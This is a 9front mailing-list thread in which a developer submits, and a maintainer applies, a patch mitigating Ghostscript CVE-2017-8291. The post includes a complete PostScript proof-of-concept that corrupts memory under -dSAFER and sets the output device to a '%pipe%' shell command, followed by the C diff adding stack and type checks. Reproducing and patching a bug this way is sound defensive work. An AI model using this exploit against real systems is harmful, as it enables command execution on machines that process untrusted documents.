* Re: [9front] ghostscript: Mitigations against CVE-2017-8291
@ 2019-06-21 16:57 cinap_lenrek
0 siblings, 0 replies; 2+ messages in thread
From: cinap_lenrek @ 2019-06-21 16:57 UTC (permalink / raw)
To: 9front
applied, thank you!
--
cinap
^ permalink raw reply [flat|nested] 2+ messages in thread
* [9front] ghostscript: Mitigations against CVE-2017-8291
@ 2019-06-21 10:53 Jacob Moody
0 siblings, 0 replies; 2+ messages in thread
From: Jacob Moody @ 2019-06-21 10:53 UTC (permalink / raw)
To: 9front
All,
Grabbed the upstream changes for the mitigation against CVE-2017-8291.
The proof of concepts I found online do not seem to do anything
interesting besides hang gs indefinitely or suicide.
To reproduce:
gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
/size_from 10000 def
/size_step 500 def
/size_to 65000 def
/enlarge 1000 def
%/bigarr 65000 array def
0
size_from size_step size_to {
pop
1 add
} for
/buffercount exch def
/buffersizes buffercount array def
0
size_from size_step size_to {
buffersizes exch 2 index exch put
1 add
} for
pop
/buffers buffercount array def
0 1 buffercount 1 sub {
/ind exch def
buffersizes ind get /cursize exch def
cursize string /curbuf exch def
buffers ind curbuf put
cursize 16 sub 1 cursize 1 sub {
curbuf exch 255 put
} for
} for
/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def
enlarge array aload
{
.eqproc
buffersearchvars 0 buffersearchvars 0 get 1 add put
buffersearchvars 1 0 put
buffersearchvars 2 0 put
buffercount {
buffers buffersearchvars 1 get get
buffersizes buffersearchvars 1 get get
16 sub get
254 le {
buffersearchvars 2 1 put
buffersearchvars 3 buffers buffersearchvars 1 get get put
buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
} if
buffersearchvars 1 buffersearchvars 1 get 1 add put
} repeat
buffersearchvars 2 get 1 ge {
exit
} if
%(.) print
} loop
.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put
buffersearchvars 0 get array aload
sdevice 0 get
16#3e8 0 put
sdevice 0 get
16#3b0 0 put
sdevice 0 get
16#3f0 0 put
currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf
.
Patch:
diff -r 986e26228cfe sys/src/cmd/gs/src/zfrsd.c
--- a/sys/src/cmd/gs/src/zfrsd.c Thu May 23 14:59:28 2019 +0200
+++ b/sys/src/cmd/gs/src/zfrsd.c Fri Jun 21 05:34:42 2019 -0500
@@ -47,13 +47,19 @@
ref *pFilter;
ref *pDecodeParms;
int Intent;
- bool AsyncRead;
+ bool AsyncRead = false;
ref empty_array, filter1_array, parms1_array;
uint i;
- int code;
+ int code = 0;
+
+ if (ref_stack_count(&o_stack) < 1)
+ return_error(e_stackunderflow);
+ if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
+ return_error(e_typecheck);
make_empty_array(&empty_array, a_readonly);
- if (dict_find_string(op, "Filter", &pFilter) > 0) {
+ if (r_has_type(op, t_dictionary)
+ && dict_find_string(op, "Filter", &pFilter) > 0) {
if (!r_is_array(pFilter)) {
if (!r_has_type(pFilter, t_name))
return_error(e_typecheck);
@@ -92,10 +98,12 @@
return_error(e_typecheck);
}
}
- if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
- (code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
- )
- return code;
+ if (r_has_type(op, t_dictionary))
+ code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
+
+ if (r_has_type(op, t_dictionary))
+ if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
+ return code;
push(1);
op[-1] = *pFilter;
if (pDecodeParms)
diff -r 986e26228cfe sys/src/cmd/gs/src/zmisc3.c
--- a/sys/src/cmd/gs/src/zmisc3.c Thu May 23 14:59:28 2019 +0200
+++ b/sys/src/cmd/gs/src/zmisc3.c Fri Jun 21 05:34:42 2019 -0500
@@ -55,6 +55,12 @@
ref2_t stack[MAX_DEPTH + 1];
ref2_t *top = stack;
+ if (ref_stack_count(&o_stack) < 2)
+ return_error(e_stackunderflow);
+ if (!r_is_array(op - 1) || !r_is_array(op)) {
+ return_error(e_typecheck);
+ }
+
make_array(&stack[0].proc1, 0, 1, op - 1);
make_array(&stack[0].proc2, 0, 1, op);
for (;;) {
Thanks,
moody
^ permalink raw reply [flat|nested] 2+ messages in thread
end of thread, other threads:[~2019-06-21 16:57 UTC | newest]
Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2019-06-21 16:57 [9front] ghostscript: Mitigations against CVE-2017-8291 cinap_lenrek
-- strict thread matches above, loose matches on Subject: below --
2019-06-21 10:53 Jacob Moody
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).